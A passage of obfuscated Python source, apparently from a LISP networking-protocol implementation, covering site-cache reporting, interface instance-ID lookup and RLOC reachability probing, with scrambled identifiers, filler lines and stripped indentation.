i1ii1i1Ii11 [ "eid-prefix" ] = Oooo00oo . eid . print_prefix ( )
if ( Oooo00oo . group . is_null ( ) == False ) :
i1ii1i1Ii11 [ "group-prefix" ] = Oooo00oo . group . print_prefix ( )
if 18 - 18: OoO0O00 * ooOoO0o
if 32 - 32: oO0o . OoooooooOO - o0oOOo0O0Ooo + II111iiii
ooOOo = [ ]
for I1I111iIiI in Oooo00oo . rloc_set :
I1II = { }
if ( I1I111iIiI . rloc . is_null ( ) == False ) :
I1II [ "rloc" ] = I1I111iIiI . rloc . print_address_no_iid ( )
if 4 - 4: OOooOOo * I1IiiI - I11i - I11i
if ( I1I111iIiI . rloc_name != None ) : I1II [ "rloc-name" ] = I1I111iIiI . rloc_name
if ( I1I111iIiI . interface != None ) : I1II [ "interface" ] = I1I111iIiI . interface
oo00O = I1I111iIiI . translated_rloc
if ( oo00O . is_null ( ) == False ) :
I1II [ "translated-rloc" ] = oo00O . print_address_no_iid ( )
if 53 - 53: I11i
if ( I1II != { } ) : ooOOo . append ( I1II )
if 71 - 71: I1ii11iIi11i + Oo0Ooo % II111iiii / Oo0Ooo / II111iiii - OoO0O00
if 14 - 14: o0oOOo0O0Ooo / I1ii11iIi11i / i11iIiiIii . OOooOOo . Oo0Ooo
if 3 - 3: o0oOOo0O0Ooo
if 68 - 68: OoOoOO00 + I1ii11iIi11i % i11iIiiIii
if 58 - 58: OoO0O00 / Oo0Ooo + Ii1I
i1ii1i1Ii11 [ "rlocs" ] = ooOOo
if 63 - 63: OOooOOo / I1ii11iIi11i
if 86 - 86: O0 + iII111i + OoooooooOO / iII111i * I1ii11iIi11i * OoooooooOO
if 89 - 89: oO0o - OOooOOo / iII111i - I1IiiI
if 78 - 78: iIii1I11I1II1 + O0 + IiII . I11i / i11iIiiIii . O0
oOO00o0 . append ( i1ii1i1Ii11 )
if 21 - 21: OoOoOO00 * OOooOOo + oO0o + O0
return ( oOO00o0 )
if 59 - 59: i1IIi / OoooooooOO . OoO0O00 / OOooOOo % o0oOOo0O0Ooo - i11iIiiIii
if 58 - 58: IiII . Ii1I + II111iiii
if 31 - 31: i11iIiiIii + i11iIiiIii + I11i * Oo0Ooo . I11i
if 28 - 28: OOooOOo * iIii1I11I1II1 * OoOoOO00
if 75 - 75: Oo0Ooo % IiII + II111iiii + oO0o
if 35 - 35: I1ii11iIi11i - oO0o - O0 / iII111i % IiII
if 10 - 10: OOooOOo + oO0o - I1Ii111 . I1IiiI
def lisp_gather_site_cache_data ( se , data ) :
i1ii1i1Ii11 = { }
i1ii1i1Ii11 [ "site-name" ] = se . site . site_name
i1ii1i1Ii11 [ "instance-id" ] = str ( se . eid . instance_id )
i1ii1i1Ii11 [ "eid-prefix" ] = se . eid . print_prefix_no_iid ( )
if ( se . group . is_null ( ) == False ) :
i1ii1i1Ii11 [ "group-prefix" ] = se . group . print_prefix_no_iid ( )
if 11 - 11: I1ii11iIi11i . I1Ii111 / o0oOOo0O0Ooo + IiII
i1ii1i1Ii11 [ "registered" ] = "yes" if se . registered else "no"
i1ii1i1Ii11 [ "first-registered" ] = lisp_print_elapsed ( se . first_registered )
i1ii1i1Ii11 [ "last-registered" ] = lisp_print_elapsed ( se . last_registered )
if 73 - 73: OoO0O00 . i11iIiiIii * OoO0O00 * i1IIi + I11i
o0o00O0oOooO0 = se . last_registerer
o0o00O0oOooO0 = "none" if o0o00O0oOooO0 . is_null ( ) else o0o00O0oOooO0 . print_address ( )
i1ii1i1Ii11 [ "last-registerer" ] = o0o00O0oOooO0
i1ii1i1Ii11 [ "ams" ] = "yes" if ( se . accept_more_specifics ) else "no"
i1ii1i1Ii11 [ "dynamic" ] = "yes" if ( se . dynamic ) else "no"
i1ii1i1Ii11 [ "site-id" ] = str ( se . site_id )
if ( se . xtr_id_present ) :
i1ii1i1Ii11 [ "xtr-id" ] = "0x" + lisp_hex_string ( se . xtr_id )
if 27 - 27: i11iIiiIii / OoOoOO00 % O0 / II111iiii . I11i - ooOoO0o
if 54 - 54: oO0o * II111iiii
if 79 - 79: o0oOOo0O0Ooo . ooOoO0o . Oo0Ooo * OoooooooOO
if 98 - 98: ooOoO0o
if 73 - 73: I1Ii111
OoO0oOOooOO = [ ]
for I1II in se . registered_rlocs :
I1I111iIiI = { }
I1I111iIiI [ "address" ] = I1II . rloc . print_address_no_iid ( ) if I1II . rloc_exists ( ) else "none"
if 97 - 97: OoO0O00 * Ii1I + Oo0Ooo
if 83 - 83: II111iiii - Oo0Ooo % II111iiii * o0oOOo0O0Ooo
if ( I1II . geo ) : I1I111iIiI [ "geo" ] = I1II . geo . print_geo ( )
if ( I1II . elp ) : I1I111iIiI [ "elp" ] = I1II . elp . print_elp ( False )
if ( I1II . rle ) : I1I111iIiI [ "rle" ] = I1II . rle . print_rle ( False , True )
if ( I1II . json ) : I1I111iIiI [ "json" ] = I1II . json . print_json ( False )
if ( I1II . rloc_name ) : I1I111iIiI [ "rloc-name" ] = I1II . rloc_name
I1I111iIiI [ "uptime" ] = lisp_print_elapsed ( I1II . uptime )
I1I111iIiI [ "upriority" ] = str ( I1II . priority )
I1I111iIiI [ "uweight" ] = str ( I1II . weight )
I1I111iIiI [ "mpriority" ] = str ( I1II . mpriority )
I1I111iIiI [ "mweight" ] = str ( I1II . mweight )
if 51 - 51: iII111i * iIii1I11I1II1 % Ii1I * Ii1I + i11iIiiIii . OoooooooOO
OoO0oOOooOO . append ( I1I111iIiI )
if 54 - 54: i11iIiiIii . iIii1I11I1II1 * iIii1I11I1II1 + Ii1I % I11i - OoO0O00
i1ii1i1Ii11 [ "registered-rlocs" ] = OoO0oOOooOO
if 16 - 16: IiII % iIii1I11I1II1 * i11iIiiIii + O0
data . append ( i1ii1i1Ii11 )
return ( [ True , data ] )
if 76 - 76: iII111i * OOooOOo
if 7 - 7: ooOoO0o + o0oOOo0O0Ooo + o0oOOo0O0Ooo
if 73 - 73: IiII % I11i % i11iIiiIii + ooOoO0o
if 83 - 83: Ii1I * I1Ii111 * i11iIiiIii / iIii1I11I1II1 % I1ii11iIi11i
if 40 - 40: iII111i
if 21 - 21: I1Ii111 / iII111i + Oo0Ooo / I1ii11iIi11i / I1Ii111
if 33 - 33: OoooooooOO
def lisp_process_api_site_cache_entry ( parms ) :
IiIIi11i111 = parms [ "instance-id" ]
IiIIi11i111 = 0 if ( IiIIi11i111 == "" ) else int ( IiIIi11i111 )
if 59 - 59: i11iIiiIii - OoooooooOO . ooOoO0o / i11iIiiIii % iIii1I11I1II1 * I1ii11iIi11i
if 45 - 45: I1ii11iIi11i * I1ii11iIi11i
if 31 - 31: OoO0O00 - OOooOOo . iII111i * I1Ii111 * iII111i + I1ii11iIi11i
if 5 - 5: Oo0Ooo . I1Ii111
iiI1I1IIi = lisp_address ( LISP_AFI_NONE , "" , 0 , IiIIi11i111 )
iiI1I1IIi . store_prefix ( parms [ "eid-prefix" ] )
if 77 - 77: i11iIiiIii / I1Ii111 / I1ii11iIi11i % oO0o
if 83 - 83: Ii1I % iIii1I11I1II1 / I1ii11iIi11i + I11i
if 23 - 23: iIii1I11I1II1 - I1IiiI
if 51 - 51: OoooooooOO / IiII / I1ii11iIi11i . Oo0Ooo - o0oOOo0O0Ooo * OoooooooOO
if 40 - 40: OoO0O00 / IiII . O0 / I1IiiI + OoO0O00 . o0oOOo0O0Ooo
OOo0oOOO0 = lisp_address ( LISP_AFI_NONE , "" , 0 , IiIIi11i111 )
if ( parms . has_key ( "group-prefix" ) ) :
OOo0oOOO0 . store_prefix ( parms [ "group-prefix" ] )
if 25 - 25: ooOoO0o * I1Ii111 * oO0o
if 64 - 64: Ii1I / I1ii11iIi11i
oOO00o0 = [ ]
iIiIi1I = lisp_site_eid_lookup ( iiI1I1IIi , OOo0oOOO0 , False )
if ( iIiIi1I ) : lisp_gather_site_cache_data ( iIiIi1I , oOO00o0 )
return ( oOO00o0 )
if 30 - 30: OoooooooOO + O0 / I1ii11iIi11i * o0oOOo0O0Ooo
if 11 - 11: O0 + OoO0O00 - Oo0Ooo - Oo0Ooo . i11iIiiIii
if 15 - 15: Ii1I % i11iIiiIii / OoOoOO00
if 85 - 85: ooOoO0o . i1IIi / iII111i % iIii1I11I1II1 / II111iiii / I1Ii111
if 60 - 60: iIii1I11I1II1 - iIii1I11I1II1 . I11i
if 55 - 55: OoO0O00
if 87 - 87: Ii1I - iII111i / O0 - o0oOOo0O0Ooo - iIii1I11I1II1 % Ii1I
def lisp_get_interface_instance_id ( device , source_eid ) :
II1i = None
if ( lisp_myinterfaces . has_key ( device ) ) :
II1i = lisp_myinterfaces [ device ]
if 47 - 47: iII111i * I1Ii111 % o0oOOo0O0Ooo / OoOoOO00 / OoO0O00 % OoO0O00
if 43 - 43: Oo0Ooo
if 34 - 34: OoO0O00 . i1IIi + IiII * IiII
if 76 - 76: OOooOOo
if 54 - 54: O0 * II111iiii * OOooOOo
if 44 - 44: I1IiiI
if ( II1i == None or II1i . instance_id == None ) :
return ( lisp_default_iid )
if 66 - 66: o0oOOo0O0Ooo
if 40 - 40: OOooOOo * Ii1I
if 38 - 38: ooOoO0o
if 5 - 5: OoooooooOO + iII111i - I11i
if 95 - 95: OOooOOo / i11iIiiIii - Ii1I + I1ii11iIi11i
if 7 - 7: I1ii11iIi11i
if 37 - 37: O0 . II111iiii
if 70 - 70: o0oOOo0O0Ooo / iII111i + i1IIi + I11i % iIii1I11I1II1 % Oo0Ooo
if 1 - 1: O0 + OoO0O00 . i11iIiiIii + I1Ii111 - OoO0O00 - IiII
IiIIi11i111 = II1i . get_instance_id ( )
if ( source_eid == None ) : return ( IiIIi11i111 )
if 1 - 1: I1ii11iIi11i / i1IIi . I1IiiI / Ii1I
IiiII = source_eid . instance_id
IiII1IIii1 = None
for II1i in lisp_multi_tenant_interfaces :
if ( II1i . device != device ) : continue
ii1111Ii = II1i . multi_tenant_eid
source_eid . instance_id = ii1111Ii . instance_id
if ( source_eid . is_more_specific ( ii1111Ii ) == False ) : continue
if ( IiII1IIii1 == None or IiII1IIii1 . multi_tenant_eid . mask_len < ii1111Ii . mask_len ) :
IiII1IIii1 = II1i
if 10 - 10: OoOoOO00 % I1ii11iIi11i * O0
if 20 - 20: ooOoO0o + I1IiiI - IiII % ooOoO0o - IiII . oO0o
source_eid . instance_id = IiiII
if 39 - 39: O0 / oO0o % oO0o * iIii1I11I1II1
if ( IiII1IIii1 == None ) : return ( IiIIi11i111 )
return ( IiII1IIii1 . get_instance_id ( ) )
if 7 - 7: iII111i % o0oOOo0O0Ooo / II111iiii % IiII / iIii1I11I1II1
if 17 - 17: I11i * I11i - O0 / IiII + OoOoOO00
if 65 - 65: I1Ii111 * i1IIi
if 10 - 10: OOooOOo % IiII
if 20 - 20: I11i / OoooooooOO % OoOoOO00 . oO0o * I1IiiI % IiII
if 84 - 84: I1ii11iIi11i % I11i / OOooOOo % O0
if 63 - 63: Ii1I / I1ii11iIi11i / Oo0Ooo
if 74 - 74: i1IIi
if 38 - 38: II111iiii * i1IIi
def lisp_allow_dynamic_eid ( device , eid ) :
if ( lisp_myinterfaces . has_key ( device ) == False ) : return ( None )
if 43 - 43: O0 - OOooOOo / I1IiiI * II111iiii . OoooooooOO / OoOoOO00
II1i = lisp_myinterfaces [ device ]
oooo0oo = device if II1i . dynamic_eid_device == None else II1i . dynamic_eid_device
if 4 - 4: OoooooooOO * I1ii11iIi11i - I1ii11iIi11i
if 38 - 38: I1Ii111
if ( II1i . does_dynamic_eid_match ( eid ) ) : return ( oooo0oo )
return ( None )
if 23 - 23: Ii1I . I1ii11iIi11i + I1Ii111 + i1IIi * o0oOOo0O0Ooo - i11iIiiIii
if 92 - 92: I1Ii111 - I1IiiI + Ii1I / iII111i % OOooOOo
if 32 - 32: i1IIi . iII111i - Ii1I % iII111i % II111iiii - oO0o
if 36 - 36: OoooooooOO * OoooooooOO . ooOoO0o . O0
if 5 - 5: I11i % I1IiiI - OoO0O00 . Oo0Ooo
if 79 - 79: iII111i + IiII % I11i . Oo0Ooo / IiII * iII111i
if 40 - 40: iII111i - I1IiiI + OoOoOO00
def lisp_start_rloc_probe_timer ( interval , lisp_sockets ) :
global lisp_rloc_probe_timer
if 2 - 2: I11i - II111iiii / I1Ii111
if ( lisp_rloc_probe_timer != None ) : lisp_rloc_probe_timer . cancel ( )
if 27 - 27: OoO0O00 - I1ii11iIi11i * i11iIiiIii + Oo0Ooo
IIi1I = lisp_process_rloc_probe_timer
iiI1I = threading . Timer ( interval , IIi1I , [ lisp_sockets ] )
lisp_rloc_probe_timer = iiI1I
iiI1I . start ( )
return
if 93 - 93: OoO0O00 % I1IiiI % iIii1I11I1II1
if 98 - 98: OoO0O00 % oO0o - II111iiii / OoOoOO00 / IiII * oO0o
if 52 - 52: O0 % iII111i * iIii1I11I1II1 / I11i / I1IiiI * ooOoO0o
if 93 - 93: iIii1I11I1II1 . II111iiii * OOooOOo - iIii1I11I1II1 . oO0o % Oo0Ooo
if 92 - 92: OoO0O00
if 42 - 42: I1ii11iIi11i - iIii1I11I1II1 % ooOoO0o
if 7 - 7: Oo0Ooo / ooOoO0o + o0oOOo0O0Ooo
def lisp_show_rloc_probe_list ( ) :
lprint ( bold ( "----- RLOC-probe-list -----" , False ) )
for o0Oo in lisp_rloc_probe_list :
III = lisp_rloc_probe_list [ o0Oo ]
lprint ( "RLOC {}:" . format ( o0Oo ) )
for I1I111iIiI , iIIi1iI1I1IIi , i11ii in III :
lprint ( " [{}, {}, {}, {}]" . format ( hex ( id ( I1I111iIiI ) ) , iIIi1iI1I1IIi . print_prefix ( ) ,
i11ii . print_prefix ( ) , I1I111iIiI . translated_port ) )
if 10 - 10: I11i + O0 % ooOoO0o - iIii1I11I1II1 * iIii1I11I1II1
if 4 - 4: OoooooooOO / I1ii11iIi11i - iII111i
lprint ( bold ( "---------------------------" , False ) )
return
if 34 - 34: OOooOOo . i1IIi * o0oOOo0O0Ooo - I1Ii111 + I1ii11iIi11i
if 32 - 32: i11iIiiIii . I1Ii111
if 38 - 38: O0
if 50 - 50: i11iIiiIii * OoO0O00 + iII111i / O0 * oO0o % ooOoO0o
if 6 - 6: OoO0O00 . o0oOOo0O0Ooo / Ii1I + Ii1I
if 59 - 59: II111iiii - o0oOOo0O0Ooo * OoooooooOO
if 83 - 83: oO0o . iIii1I11I1II1 . iII111i % Oo0Ooo
if 48 - 48: oO0o % OoO0O00 - OoooooooOO . IiII
if 11 - 11: I1Ii111 % o0oOOo0O0Ooo - o0oOOo0O0Ooo % OoooooooOO . o0oOOo0O0Ooo - I1ii11iIi11i
def lisp_mark_rlocs_for_other_eids ( eid_list ) :
if 33 - 33: OoO0O00 + II111iiii . Oo0Ooo * I1Ii111
if 63 - 63: OoooooooOO + OoOoOO00 - OoooooooOO
if 54 - 54: OoO0O00 + I1IiiI % O0 + OoO0O00
if 37 - 37: II111iiii / I1ii11iIi11i * I1IiiI - OoooooooOO
I1II , iIIi1iI1I1IIi , i11ii = eid_list [ 0 ]
O000i11II11I = [ lisp_print_eid_tuple ( iIIi1iI1I1IIi , i11ii ) ]
if 43 - 43: iIii1I11I1II1
for I1II , iIIi1iI1I1IIi , i11ii in eid_list [ 1 : : ] :
I1II . state = LISP_RLOC_UNREACH_STATE
I1II . last_state_change = lisp_get_timestamp ( )
O000i11II11I . append ( lisp_print_eid_tuple ( iIIi1iI1I1IIi , i11ii ) )
if 29 - 29: IiII . OoOoOO00 + I1IiiI
if 42 - 42: iIii1I11I1II1 * OoOoOO00 * I11i + iII111i / i11iIiiIii
i1i11I = bold ( "unreachable" , False )
O0ooo0Ooo = red ( I1II . rloc . print_address_no_iid ( ) , False )
if 28 - 28: I1ii11iIi11i - i11iIiiIii % i11iIiiIii
for iiI1I1IIi in O000i11II11I :
iIIi1iI1I1IIi = green ( iiI1I1IIi , False )
lprint ( "RLOC {} went {} for EID {}" . format ( O0ooo0Ooo , i1i11I , iIIi1iI1I1IIi ) )
if 31 - 31: iII111i
if 64 - 64: Ii1I
if 4 - 4: OoOoOO00
if 78 - 78: i1IIi - iII111i + O0 - I1IiiI % o0oOOo0O0Ooo
if 48 - 48: iII111i / II111iiii * I1Ii111 + I11i / ooOoO0o . OoOoOO00
if 45 - 45: OOooOOo / Ii1I % O0
for I1II , iIIi1iI1I1IIi , i11ii in eid_list :
o0oO0o00 = lisp_map_cache . lookup_cache ( iIIi1iI1I1IIi , True )
if ( o0oO0o00 ) : lisp_write_ipc_map_cache ( True , o0oO0o00 )
if 7 - 7: oO0o * i11iIiiIii + OoooooooOO + I11i
return
if 9 - 9: II111iiii * Oo0Ooo * I1Ii111 . IiII
if 80 - 80: i11iIiiIii . i11iIiiIii . i11iIiiIii . OoooooooOO - OOooOOo * OoooooooOO
if 96 - 96: oO0o
if 80 - 80: IiII - oO0o % Ii1I - iIii1I11I1II1 . OoO0O00
if 64 - 64: I1IiiI % i11iIiiIii / oO0o
if 78 - 78: II111iiii - Oo0Ooo . iIii1I11I1II1 - ooOoO0o . oO0o
if 84 - 84: iII111i . ooOoO0o * I1IiiI * Oo0Ooo / I1Ii111
if 93 - 93: i1IIi * i11iIiiIii % OoOoOO00 % iII111i
if 31 - 31: OoO0O00
if 89 - 89: II111iiii
def lisp_process_rloc_probe_timer ( lisp_sockets ) :
lisp_set_exception ( )
if 33 - 33: OOooOOo / oO0o % OoOoOO00 * O0
lisp_start_rloc_probe_timer ( LISP_RLOC_PROBE_INTERVAL , lisp_sockets )
if ( lisp_rloc_probing == False ) : return
if 65 - 65: OoO0O00 % OoOoOO00 % I1ii11iIi11i / OoooooooOO
if 85 - 85: O0 * OOooOOo % I1Ii111
if 33 - 33: O0
if 30 - 30: II111iiii . O0 . oO0o * I1ii11iIi11i + oO0o . o0oOOo0O0Ooo
if ( lisp_print_rloc_probe_list ) : lisp_show_rloc_probe_list ( )
if 43 - 43: iIii1I11I1II1
if 88 - 88: I1IiiI - OoO0O00 . O0 . oO0o
if 75 - 75: II111iiii % OOooOOo / iIii1I11I1II1 / OoO0O00 + oO0o
if 16 - 16: oO0o + I1Ii111 - II111iiii - o0oOOo0O0Ooo / i11iIiiIii
oOO0O00O0 = lisp_get_default_route_next_hops ( )
if 69 - 69: o0oOOo0O0Ooo * OOooOOo - ooOoO0o
lprint ( "---------- Start RLOC Probing for {} entries ----------" . format ( len ( lisp_rloc_probe_list ) ) )
if 14 - 14: o0oOOo0O0Ooo . OoooooooOO - I1ii11iIi11i * iII111i / ooOoO0o
if 99 - 99: I1ii11iIi11i + I11i
if 29 - 29: I1ii11iIi11i / oO0o
if 2 - 2: Oo0Ooo / IiII - OoooooooOO
if 65 - 65: OoO0O00 - Ii1I
I1I1 = 0
oO0oo000O = bold ( "RLOC-probe" , False )
for OO000oOooO00 in lisp_rloc_probe_list . values ( ) :
if 38 - 38: I1ii11iIi11i + iII111i . i1IIi . I1ii11iIi11i / iII111i . i1IIi
if 98 - 98: i1IIi % OoOoOO00 + Ii1I / OOooOOo
if 16 - 16: II111iiii % oO0o
if 59 - 59: iII111i
if 26 - 26: I11i + o0oOOo0O0Ooo / OoO0O00
oOiIiI = None
for iIii1iI1I1IiI , iiI1I1IIi , OOo0oOOO0 in OO000oOooO00 :
oo0o00OO = iIii1iI1I1IiI . rloc . print_address_no_iid ( )
if 13 - 13: I1ii11iIi11i % OOooOOo * IiII * OoO0O00
if 76 - 76: OOooOOo
if 90 - 90: oO0o / Oo0Ooo + iII111i - O0
if 76 - 76: ooOoO0o + IiII / I1ii11iIi11i . iIii1I11I1II1
oO0ooO0O000 , oo00ooOOOO00O , IIIi1i1iIIIi = lisp_allow_gleaning ( iiI1I1IIi , None , iIii1iI1I1IiI )
if ( oO0ooO0O000 and oo00ooOOOO00O == False ) :
iIIi1iI1I1IIi = green ( iiI1I1IIi . print_address ( ) , False )
oo0o00OO += ":{}" . format ( iIii1iI1I1IiI . translated_port )
lprint ( "Suppress probe to RLOC {} for gleaned EID {}" . format ( red ( oo0o00OO , False ) , iIIi1iI1I1IIi ) )
if 59 - 59: OoooooooOO . iIii1I11I1II1 * OoooooooOO + ooOoO0o
continue
if 56 - 56: OoOoOO00 . iII111i / OOooOOo
if 39 - 39: iIii1I11I1II1 % ooOoO0o
if 75 - 75: i1IIi * II111iiii * O0 * i11iIiiIii % iII111i / iII111i
if 36 - 36: IiII / I1IiiI % iII111i / iII111i
if 38 - 38: OOooOOo * I1ii11iIi11i * I1Ii111 + I11i
if 65 - 65: O0 + O0 * I1Ii111
if 66 - 66: OOooOOo / O0 + i1IIi . O0 % I1ii11iIi11i - OoooooooOO
if ( iIii1iI1I1IiI . down_state ( ) ) : continue
if 16 - 16: I11i % iII111i
if 29 - 29: I1IiiI - ooOoO0o * OoO0O00 . i11iIiiIii % OoOoOO00 * o0oOOo0O0Ooo
if 43 - 43: OoO0O00 * OOooOOo / I1Ii111 % OoOoOO00 . oO0o / OOooOOo
if 62 - 62: O0 * I1ii11iIi11i - O0 / I11i % ooOoO0o
if 1 - 1: O0 / iIii1I11I1II1
if 17 - 17: OoOoOO00 + ooOoO0o * II111iiii * OoOoOO00 + I1IiiI + i11iIiiIii
if 46 - 46: i1IIi - II111iiii . I1IiiI . i11iIiiIii
if 54 - 54: O0 * I1ii11iIi11i / OOooOOo / IiII * IiII
if 69 - 69: Oo0Ooo * OoooooooOO / I1IiiI
if 16 - 16: o0oOOo0O0Ooo
if 3 - 3: i11iIiiIii . I1ii11iIi11i
if ( oOiIiI ) :
iIii1iI1I1IiI . last_rloc_probe_nonce = oOiIiI . last_rloc_probe_nonce
if 65 - 65: II111iiii * iII111i - OoO0O00 + oO0o % OoO0O00
if ( oOiIiI . translated_port == iIii1iI1I1IiI . translated_port and oOiIiI . rloc_name == iIii1iI1I1IiI . rloc_name ) :
if 83 - 83: OoooooooOO % I1ii11iIi11i . IiII + OOooOOo . iII111i - ooOoO0o
iIIi1iI1I1IIi = green ( lisp_print_eid_tuple ( iiI1I1IIi , OOo0oOOO0 ) , False )
lprint ( "Suppress probe to duplicate RLOC {} for {}" . format ( red ( oo0o00OO , False ) , iIIi1iI1I1IIi ) )
if 100 - 100: o0oOOo0O0Ooo
if 95 - 95: iII111i * oO0o * i1IIi
if 100 - 100: iII111i . o0oOOo0O0Ooo - I1Ii111 % oO0o
if 11 - 11: o0oOOo0O0Ooo . OoooooooOO - i1IIi
if 71 - 71: I1IiiI . OOooOOo . I1ii11iIi11i
if 90 - 90: i11iIiiIii + I1Ii111 % II111iiii
iIii1iI1I1IiI . last_rloc_probe = oOiIiI . last_rloc_probe
continue
if 67 - 67: OoOoOO00 / iII111i * OoO0O00 % i11iIiiIii
if 76 - 76: OoO0O00
if 92 - 92: iIii1I11I1II1 * O0 % I11i
Oo00 = None
I1II = None
while ( True ) :
I1II = iIii1iI1I1IiI if I1II == None else I1II . next_rloc
if ( I1II == None ) : break
if 92 - 92: OoOoOO00 + oO0o
if 89 - 89: IiII % iII111i / iIii1I11I1II1 . Ii1I . Oo0Ooo + ooOoO0o
if 28 - 28: I1IiiI . iIii1I11I1II1
if 12 - 12: I1Ii111 * OOooOOo
if 11 - 11: II111iiii % O0 % O0 % o0oOOo0O0Ooo
if ( I1II . rloc_next_hop != None ) :
if ( I1II . rloc_next_hop not in oOO0O00O0 ) :
if ( I1II . up_state ( ) ) :
o0 , I1IIIIiI1i = I1II . rloc_next_hop
I1II . state = LISP_RLOC_UNREACH_STATE
I1II . last_state_change = lisp_get_timestamp ( )
lisp_update_rtr_updown ( I1II . rloc , False )
if 45 - 45: OoooooooOO * oO0o
i1i11I = bold ( "unreachable" , False )
lprint ( "Next-hop {}({}) for RLOC {} is {}" . format ( I1IIIIiI1i , o0 ,
red ( oo0o00OO , False ) , i1i11I ) )
continue
if 74 - 74: ooOoO0o * I11i / oO0o - IiII + OoOoOO00
if 16 - 16: Oo0Ooo
if 29 - 29: Oo0Ooo . I1ii11iIi11i / II111iiii / oO0o / o0oOOo0O0Ooo + I11i
if 4 - 4: OoooooooOO % I1ii11iIi11i . OoO0O00 * o0oOOo0O0Ooo + I1ii11iIi11i * IiII
if 67 - 67: I1IiiI
if 93 - 93: ooOoO0o . Ii1I + IiII / Oo0Ooo % I11i
IiI1i11iiII = I1II . last_rloc_probe
IIiIi11iiiI = 0 if IiI1i11iiII == None else time . time ( ) - IiI1i11iiII
if ( I1II . unreach_state ( ) and IIiIi11iiiI < LISP_RLOC_PROBE_INTERVAL ) :
lprint ( "Waiting for probe-reply from RLOC {}" . format ( red ( oo0o00OO , False ) ) )
if 56 - 56: OoooooooOO . i11iIiiIii % Oo0Ooo / i1IIi % o0oOOo0O0Ooo
continue
if 53 - 53: Ii1I % iIii1I11I1II1 + OOooOOo * IiII
if 96 - 96: I1IiiI . IiII + I11i / iIii1I11I1II1
if 27 - 27: I11i - Ii1I * OoOoOO00 % iIii1I11I1II1
if 69 - 69: Ii1I . II111iiii + o0oOOo0O0Ooo * iII111i
if 95 - 95: II111iiii / iII111i + i1IIi
if 70 - 70: IiII . I1Ii111
oooooO0oO0o = lisp_get_echo_nonce ( None , oo0o00OO )
if ( oooooO0oO0o and oooooO0oO0o . request_nonce_timeout ( ) ) :
I1II . state = LISP_RLOC_NO_ECHOED_NONCE_STATE
I1II . last_state_change = lisp_get_timestamp ( )
i1i11I = bold ( "unreachable" , False )
lprint ( "RLOC {} went {}, nonce-echo failed" . format ( red ( oo0o00OO , False ) , i1i11I ) )
if 29 - 29: Oo0Ooo . i11iIiiIii + OoOoOO00 - Oo0Ooo
lisp_update_rtr_updown ( I1II . rloc , False )
continue
if 13 - 13: ooOoO0o
if 56 - 56: I1Ii111 / I1ii11iIi11i . i1IIi + I1ii11iIi11i / OoooooooOO - I1IiiI
if 3 - 3: ooOoO0o
if 68 - 68: o0oOOo0O0Ooo
if 36 - 36: Oo0Ooo . I11i + I1IiiI * i1IIi % Ii1I + OOooOOo
if 5 - 5: o0oOOo0O0Ooo % oO0o / OoO0O00
if ( oooooO0oO0o and oooooO0oO0o . recently_echoed ( ) ) :
lprint ( ( "Suppress RLOC-probe to {}, nonce-echo " + "received" ) . format ( red ( oo0o00OO , False ) ) )
if 17 - 17: OoooooooOO - I1ii11iIi11i / OoO0O00 - I1Ii111 + i1IIi
continue
if 6 - 6: Oo0Ooo - II111iiii
if 33 - 33: I1Ii111 - I1IiiI + iII111i . OoOoOO00
if 91 - 91: OOooOOo / Ii1I / IiII * OOooOOo
if 68 - 68: I11i
if 91 - 91: I11i
if 24 - 24: ooOoO0o . i1IIi - O0 + I11i
if ( I1II . last_rloc_probe != None ) :
IiI1i11iiII = I1II . last_rloc_probe_reply
if ( IiI1i11iiII == None ) : IiI1i11iiII = 0
IIiIi11iiiI = time . time ( ) - IiI1i11iiII
if ( I1II . up_state ( ) and IIiIi11iiiI >= LISP_RLOC_PROBE_REPLY_WAIT ) :
if 71 - 71: OoOoOO00
I1II . state = LISP_RLOC_UNREACH_STATE
I1II . last_state_change = lisp_get_timestamp ( )
lisp_update_rtr_updown ( I1II . rloc , False )
i1i11I = bold ( "unreachable" , False )
lprint ( "RLOC {} went {}, probe it" . format ( red ( oo0o00OO , False ) , i1i11I ) )
if 29 - 29: O0 . i11iIiiIii
if 51 - 51: IiII
lisp_mark_rlocs_for_other_eids ( OO000oOooO00 )
if 53 - 53: O0
if 19 - 19: o0oOOo0O0Ooo / iII111i % OoOoOO00
if 65 - 65: o0oOOo0O0Ooo
I1II . last_rloc_probe = lisp_get_timestamp ( )
if 89 - 89: iIii1I11I1II1 + OoooooooOO + i1IIi + OoooooooOO % IiII * OoO0O00
O00OOOOOOo0oo = "" if I1II . unreach_state ( ) == False else " unreachable"
if 80 - 80: O0 * OOooOOo + i1IIi + i11iIiiIii * o0oOOo0O0Ooo
if 14 - 14: II111iiii * OOooOOo - O0 / I1ii11iIi11i . OoO0O00 . ooOoO0o
if 98 - 98: o0oOOo0O0Ooo . i1IIi
if 83 - 83: i11iIiiIii + OOooOOo % iII111i
if 59 - 59: I11i
if 23 - 23: OoOoOO00 * I1Ii111
if 18 - 18: o0oOOo0O0Ooo % i11iIiiIii . Ii1I . O0
OOOo0OOo0oOo0 = ""
I1IIIIiI1i = None
if ( I1II . rloc_next_hop != None ) :
o0 , I1IIIIiI1i = I1II . rloc_next_hop
lisp_install_host_route ( oo0o00OO , I1IIIIiI1i , True )
OOOo0OOo0oOo0 = ", send on nh {}({})" . format ( I1IIIIiI1i , o0 )
if 17 - 17: ooOoO0o - ooOoO0o * O0
if 14 - 14: O0 - Ii1I + iIii1I11I1II1 + II111iiii . ooOoO0o + Ii1I
if 25 - 25: OoO0O00 * oO0o
if 29 - 29: OOooOOo - I1Ii111 - i11iIiiIii % i1IIi
if 2 - 2: i11iIiiIii % iIii1I11I1II1 * OOooOOo
I11iiI111iIi1I = I1II . print_rloc_probe_rtt ( )
IIIiI1 = oo0o00OO
if ( I1II . translated_port != 0 ) :
IIIiI1 += ":{}" . format ( I1II . translated_port )
if 88 - 88: OOooOOo + iII111i * oO0o % OoO0O00
IIIiI1 = red ( IIIiI1 , False )
if ( I1II . rloc_name != None ) :
IIIiI1 += " (" + blue ( I1II . rloc_name , False ) + ")"
if 24 - 24: OoooooooOO % iIii1I11I1II1 - I11i / OoOoOO00 + oO0o + II111iiii
lprint ( "Send {}{} {}, last rtt: {}{}" . format ( oO0oo000O , O00OOOOOOo0oo ,
IIIiI1 , I11iiI111iIi1I , OOOo0OOo0oOo0 ) )
if 87 - 87: O0 % i1IIi / iIii1I11I1II1 . i1IIi
if 82 - 82: OoOoOO00 % Oo0Ooo * iII111i - I11i * I1Ii111
if 65 - 65: O0 % OOooOOo * ooOoO0o * II111iiii
if 9 - 9: Oo0Ooo * Ii1I
if 17 - 17: OoOoOO00
